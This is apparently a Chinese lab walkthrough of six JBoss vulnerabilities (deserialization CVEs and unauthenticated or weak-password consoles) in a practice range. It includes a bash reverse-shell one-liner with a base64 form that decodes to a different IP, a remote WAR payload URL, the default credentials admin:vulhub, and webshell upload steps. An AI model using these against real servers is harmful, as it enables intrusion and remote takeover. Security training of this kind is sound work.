常见中间件漏洞(Jboss)靶场
1.CVE-2015-7501
开启环境查看端口
http://192.168.10.194:8080/
invoker/JMXInvokerServlet 说明接⼝开放,此接⼝存在反序列化漏洞
下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/192.168.10.194/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=
2.CVE-2017-7504
开启环境查看端口
访问http://192.168.10.194:8080/jbossmq-httpil/HTTPServerILServlet
python3 jexboss.py -u
http://192.168.10.194:8080
3.低版本JMX Console未授权
访问:http://192.168.10.194:8080/jmx-console/
找到这个
找到⻚⾯中的void addURL() 选项远程加载war包来部署。
制作war包 , 这⾥⽤之前制作好的 cmd.war
填写war包远程地址
http://47.121.212.229/sxy.war
http://192.168.10.194:8080/sxy/1.jsp
连接
4.CVE-2017-12149
开启环境
访问http://192.168.10.194:8080/invoker/readonly验证是否存在漏洞
返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞
利用工具检测如果成功直接上传webshell即可
5.Administration Console弱⼝令
http://192.168.10.194:8080/admin-console/login.seam
密码⽂件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
登录
后台
上传shell.war
连接webshell
6.⾼版本JMX Console未授权
http://192.168.10.194:8080/jmx-console/
因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub
进来点击
找到
搭建远程部署 , 部署远程war包地址
点击I
nvoke
连接Webshell